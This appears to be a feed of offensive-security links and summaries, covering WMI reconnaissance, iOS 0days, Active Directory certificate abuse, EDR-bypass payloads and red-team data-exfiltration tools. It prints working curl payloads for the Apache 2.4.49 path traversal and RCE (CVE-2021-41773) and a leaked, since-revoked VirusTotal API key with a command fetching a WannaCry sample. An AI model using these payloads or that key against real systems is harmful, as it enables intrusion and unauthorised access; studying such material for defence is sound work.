APT
Offensive WMI (Part 3) https://0xinfection.github.io/posts/wmi-registry-part-3/ #wmi
Offensive WMI - Reconnaissance & Enumeration (Part 4)
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
This is the fourth part of the “Offensive WMI” series which will focus a bit more on information gathering and enumeration. WMI provides a plethora of classes from which we can enumerate a lot of stuff. So let’s dive in without wasting any more time.
Information Gathering and Scanning for Sensitive Information
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
Testing a web application or network: information gathering is important before we test for vulnerabilities on the target.
iOS 15 0day Exploits
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
GitHub - illusionofchaos/ios-gamed-0day: iOS gamed exploit (fixed in 15.0.2)
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
Nguyen The Duc
Just got a working exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
Payload
curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
Apache 2.4.49 Payload RCE
curl --data "echo;id" 'https://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
Certipy
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Forwarded from PT SWARM
CVE-2021-26420: Remote Code Execution in Sharepoint via workflow compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
Jir-thief
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
Conf-thief
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
0-Day Hunting (Chaining Bugs/Methodology)
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
Red Team Tutorials
https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
RED TEAM TUTORIALS — №1
By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable…
ScareCrow
Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
#edr #bypass #av #fud
#bugbounty
Something interesting from our friends
https://medium.com/@i.safronov/mini-ctf-including-android-reverse-engineering-deobfuscation-antidebug-evasion-with-prizes-d32acc4a190c
Mini-CTF including Android reverse-engineering, deobfuscation, antidebug-evasion. With prizes.
Haven’t hacked anything in a while? Delivery Club cybersecurity team has a challenge for you! We created a vulnerable Android app, you need…
K8s takeover cases sample
https://github.com/Slurmio/webinar-seck8s/
Demo scripts for the Kubernetes Security Webinar held on October 13, 2021 https://www.youtube.com/watch?v=koTqZS-ThZ8&t=1183s - slurm-personal/webinar-seck8s
LDAP Monitor
Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
With this tool you can quickly see if your attack worked and if it changed LDAP attributes of the target object.
https://github.com/p0dalirius/LDAPmonitor
#ldap #monitor
VirusTotal Enterprise free API Key
API Key:
```
859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18
```
Example:
```
curl 'https://www.virustotal.com/vtapi/v2/file/download?apikey=859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18&hash=76f52cba288145242a77a8762282d8d0e6d8fb3160b5fefb7b92649e503c62a1' --location --output wannacry.exe
```
Source
UPD:
This key has been revoked
#virustotal #enterprise #apikey #free